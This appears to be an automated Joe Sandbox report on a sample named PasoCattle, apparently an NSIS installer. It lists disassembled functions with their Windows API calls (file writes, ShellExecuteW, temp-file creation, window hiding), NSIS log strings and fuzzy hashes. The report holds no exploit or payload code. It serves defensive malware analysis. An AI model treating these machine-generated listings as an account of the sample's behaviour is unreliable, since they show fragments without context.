API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
open, xrefs: 00402770

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,771B23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,771B23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

